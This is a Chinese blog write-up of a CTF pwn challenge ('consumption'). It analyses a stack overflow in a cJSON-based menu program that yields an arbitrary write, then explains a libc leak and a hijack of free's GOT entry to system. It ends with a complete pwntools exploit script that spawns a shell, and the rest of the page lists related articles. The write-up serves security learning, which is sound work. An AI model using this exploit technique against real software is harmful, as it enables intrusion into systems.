【PWN · 栈溢出 | GOT劫持】[2024 · 长城杯]consumption

于 2024-09-09 19:40:26 发布
阅读量395 收藏 7
点赞数 5
分类专栏: 【PWN · Stack】 文章标签: pwn ctf stack GOT
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/142066687
版权

通过代码审计,找到栈溢出漏洞点,覆盖关键栈变量,实现任意地址写

前言

本题主要是套壳了Cjson,实则是约定了输入格式。通过仔细代码审计,即可找到栈溢出,并实现利用 

一、题目

查阅网上资料,得知实际上就是json格式的数据,上述代码检查了是否包含这些字段。 

似乎是菜单题,可能考堆,需要逆向Cjson?后来发现确实是被唬住了 

大致的程序功能即使如此 

二、漏洞点

main函数存在栈溢出,溢出时会覆盖两个变量,v13、v14,具体看一下这两个值的作用

查看error函数,原来仅仅是返回,并没有退出程序。

 

因此通过栈溢出覆盖v13,我们就可以获得一个任意地址写的能力

v14则没有什么特殊之处,最后放了cannary;既然我们有任意地址写,就不考虑那么多:

利用思路:通过溢出获得任意地址写,将got表写在Heap数组,利用show泄露libc,然后将free的got表劫持为system,释放一个指向"/bin/sh"的指针即可  

三、利用过程

(1)栈溢出-任意地址写-写printf.got到Heap[1]

(2)show Heap[1] leak libc

 

(3)free GOT表劫持为system 

任意地址写,但是system的地址数比较大,会造成溢出,因此得通过edit来实现写。之前我们选择leak printf,也是因为GOT表printf和free相邻。通过edit写指向printfgot表的指针,即可修改freegot

(4)free Heap[0]释放指向/bin/sh的指针

 

四、EXP

from pwn import *
io=process('./consumption')
elf=ELF('./consumption')
libc=ELF('/lib/i386-linux-gnu/libc.so.6')
context.arch=elf.arch
context.log_level='debug'

##########################
global flag
def debug(touch=True,fg=False):
    global flag
    if fg:
        flag = True
        gdb.attach(io);input('[*]Pause for gdb-attach...')
    elif touch:
        if input('[?]GDB attach: ')!='':
            flag=True
            gdb.attach(io);input('[*]Pause for gdb-attach...')
        else:
            flag=False
            print("[-]GDB didn't attach")
            return
    print("[-]GDB didn't attach")
    return 

def gdb_check():
    global flag
    if(flag):
        pause()
##########################
debug()

def add(size,content):
    payload=b'{"choice":"1","idx":0,"size":"'+str(size).encode("utf-8")+b'","content":"'+content+b'"}'
    io.sendlineafter(b'exit\t\n',payload)
def delete(id):
    payload=b'{"choice":"2","idx":'+str(id).encode()+b',"size":"0","content":""}'
    io.sendlineafter(b'exit\t\n',payload)
def show(id):
    payload=b'{"choice":"3","idx":'+str(id).encode()+b',"size":"0","content":""}'
    io.sendlineafter(b'exit\t\n',payload)
def edit(id,content):
    payload=b'{"choice":"4","idx":'+str(id).encode()+b',"size":"0","content":"'+content+b'"}'
    io.sendlineafter(b'exit\t\n',payload)

# .got.plt:08051AAC 68 1B 05 08                   off_8051AAC dd offset printf            ; DATA XREF: _printf+4↑r
# .got.plt:08051AB0 BC 1B 05 08                   off_8051AB0 dd offset free              ; DATA XREF: _free+4↑r

# 0000100C s
# ...
# 00000B0C anonymous_0
# 0x100c-0xb0c=0x500

# b *0x8049985

heaplist=0x8051B10
# 溢出前提前构造好指向/bin/sh的指针
add(0x10,b'/bin/sh')

# print(elf.got['printf']) #134552236
deadbeef=b'b'*(0x500+0x6-len(b'{"choice":"1","idx":0,"size":"134552236","content":"aaaa"}'))
add(elf.got['printf'],deadbeef+p32(heaplist+4))
gdb_check()
show(1)
io.recvuntil(b'content:')
printf=u32(io.recv(4))
success(hex(printf))
libc_base=printf-0xea8fda90+0xea8a6000
success(hex(libc_base))
system=libc_base+libc.sym['system']
success(hex(system))
gdb_check()

# 方法1:通过任意地址写来劫持got表 —— system数值过大,不方便处理
# deadbeef=b'b'*(0x500+0x6-len(b'{"choice":"1","idx":0,"size":"1234567890","content":"aaaa"}'))
# add(system,deadbeef+p32(elf.got['free']))
# gdb_check()

# 方法2:printf的got表指针已经写在heap[1]中,只需要edit,即可替换邻近的free
edit(1,p32(printf)+p32(system))
delete(0)

io.interactive()

 

Mr_Fmnwon
关注
专栏目录
pwn学习总结(三) —— 栈溢出经典题型整理
qq_41988448的博客
11-19 2955
pwn学习总结(五) —— 经典题目整理一1. 栈溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 栈溢出入门 平台:jarvisoj 题目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
pwn学习】GOT劫持
Morphy_Amo的博客
12-15 4117
文章目录例题GOT劫持获取Syscallopen-read-write利用系统调用号调用open构造payload获取syscall读取flag文件exp 例题 例题:XCTF-008-Recho 查看安全策略 root@kali:~/ctf/xctf/pwn# checksec 008_Recho [*] '/root/ctf/xctf/pwn/008_Recho' Arch: amd64-64-little RELRO: Partial RELRO Stac
PWN · 格式化字符串|劫持GOT表】[watevrCTF 2019]Voting Machine 2]
最新发布
Mr_Fmnwon的博客
01-18 596
和以往不同的是,格式化字符产参数没有对齐,有两个字节的偏移需要自己填充或者交给fmtstr_payload的参数进行构造。可以通过后门函数获得flag或者getshell获得flag存在两个字节的偏移,fmtstr_payload的各个参数含义要好好掌握。
PWN · GOT劫持 | 整数溢出】[HGAME 2023 week1]choose_the_seat
Mr_Fmnwon的博客
01-17 505
整数溢出,加之保护开的不全,可以反复越界修改got表,劫持puts函数实现利用
open表和closed表_劫持got表绕过disable_functions
weixin_39559559的博客
11-24 799
最近阅读了芝士狍子糕师傅写的针对宝塔的RASP及其disable_functions的绕过的文章。觉得其中劫持got表来绕过disable_functions的方法还是比较有意思的,对于web手来说也是比较好理解的。这里通过web手的视角来理解这种绕过disable_functions的方法。前置知识/proc目录Linux系统上的/proc目录是一种文件系统,即proc文件系统。/pr...
pwn(三)
小明的小书包Ya
10-04 2460
pwn(三) 简单的溢出利用方法 程序没有开启任何保护 方法一:寻找程序中system的函数,再布局栈空间,最后成功调用system('/bin/sh') 方法二:将我们的shellcode写入bss段,然后用elf.bss()来获取bss段地址,从而程序流向到我们的shellcode 这里不用具体程序分析了,把payload分别写上 方法一:payload = 'a' * offset...
pwn栈溢出10道练习题有writeup
01-04
在这个场景中,"pwn栈溢出10道练习题有writeup" 提供了10个关于栈溢出的实战练习,每个题目都配有详细的解答,这对于学习和理解栈溢出漏洞原理及其利用技术非常有帮助。 栈溢出是由于程序在栈上分配的内存不足,...
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1277
本文主要详解CTFshow中pwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
PWN栈溢出段错误的坑
kelxLZ的博客
03-30 463
Author:ZERO-A-ONE Date:2021-03-30 一、开头 相信很多PWNer/Biner在写EXP的时候都会遇上一个令人很抓狂的问题,就是自己明明在GDB里面调试得出的地址,经过自己十分精确的计算,一阵猛写EXP,打!然后进过一连串的跳动的命令行后,激动的开始准备夺取shell,然后,然后,segment fault(code dump),哦豁段错误,GG 这个是因为什么问题呢,其本质是因为正常程序运行时,会将环境变量字符串数组和命令行参数字符串数组存放在栈顶,而程序使用的局部变量等.
浅谈PWN基础-栈溢出
qq_45751349的博客
04-04 741
一、预备知识 缓冲区溢出简单介绍 缓冲区溢出:简单的说,缓冲区溢出就是超长的数据向小缓冲区复制,导致数据超出了小缓冲区,导致缓冲区其他的数据遭到破坏,这就是缓冲区溢出。而栈溢出是缓冲区溢出的一种,也是最常见的。只不过栈溢出发生在栈,堆溢出发生在堆,其实都是一样的。 二、简介栈 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时...
buu pwn入门 有栈溢出
Sanntaa的博客
12-03 643
写题笔记
Pwn_11 Got 劫持
weixin_30822451的博客
03-08 450
比如说 把puts(str)的.got.plt的地址的值改为system函数地址 格式化字符串的综合利用 可以使用任意地址读取,获取当前函数的实际地址,从而可以获得libc的基地址 利用libc基地址+偏移地址 可以知道其他函数地址 利用任意地址写入,从而配合got hijacking更改已有函数地址   from pwn import *r = remote('127.0....
从c语言到汇编指令 长亭科技,从0开始CTF-PWN(四)ROP绕过栈可执行保护与GOT劫持...
weixin_34440860的博客
05-21 364
int main(int argc, char* argv[]) {char buf[128];if (argc < 2) return 1;strcpy(buf, argv[1]);printf("Input:%sn", buf);return 0;}使用如下命令进行编译:gcc-4.8 -g -m32 -O0 -fno-stack-protector -o pwn_test_bof3_3...
表变量是什么_GOT劫持PWN
weixin_39628247的博客
12-08 559
声明:由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,知微安全以及文章作者不为此承担任何责任。知微安全拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经知微安全允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。上次介绍IO FILE的pwn题目时,提到exit函数中,会调用标准...
2.pwn-分析外部函数的调用过程分析。(plt和got
admin的博客
09-27 351
一、使用的工具:gdb和pwngdb。 先下载gdb,在下载pwngdb 二、基础知识 .got GOT(Global Offset Table)全局偏移表。这是「链接器」为「外部符号」填充的实际偏移表。 .plt PLT(Procedure Linkage Table)程序链接表。它有两个功能,要么在 .got.plt 节中拿到地址,并跳转。要么当 .got.plt 没有所需地址的时,触发「链接器」去找到所需地址 三、编写测试程序。 我们以一个c语言调用外部的puts函数的程序为..
Pwn 学习 plt和got
MrTreebook的博客
04-24 775
目录1.简介plt和gotpltGOT2.保护机制3.执行顺序 1.简介plt和got plt PLT : 程序链接表(PLT,Procedure Link Table) GOT GOT : 全局偏移表(GOT, Global Offset Table) 此处不对概念做解释了 可以点击查看大佬的介绍 在此我以初学者的角度认识plt和got 点击跳转 点击跳转 2.保护机制 开启RELRO 在前面描述的漏洞攻击中曾多次引入了GOT覆盖方法,GOT覆盖之所以能成功是因为默认编译的应用程序的重定
pwn 练习笔记 暑假的第二天 got表覆盖
SsMing的博客
07-14 2544
pwnable passcode1.ssh连上去看源码:#include &lt;stdio.h&gt;#include &lt;stdlib.h&gt;void login(){    int passcode1;    int passcode2;    printf("enter passcode1 : ");    scanf("%d", passcode1);    fflush(std...
闭关学pwn第三天——Linux动态链接中的PLT和GOT
mid2dog
12-11 370
前言 真的是日了????好嘛! 差点从入门到入坟的pwn,我又来了。 果然不补点基础直接看exp会死人的!! 遇到了ret2libc,也就是上回讲到的栈溢出的一种,然后直接看了个exp被搞得头大。于是乎,决定先把plt表和got表给补了,高频词汇却不理解什么玩意,太伤了orz。 开工!!! ——————————————————————————————————— libc libc是一个c库,装着c语言的...
ctfshow PWN 栈溢出
08-23
ctfshow PWN中,栈溢出是一种常见的攻击方式。 根据提供的引用,我了解到栈溢出是一种通过向程序输入过长的数据导致数据溢出栈的一种攻击手段。栈是一种数据结构,用于存储程序的局部变量和函数调用的返回地址等...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值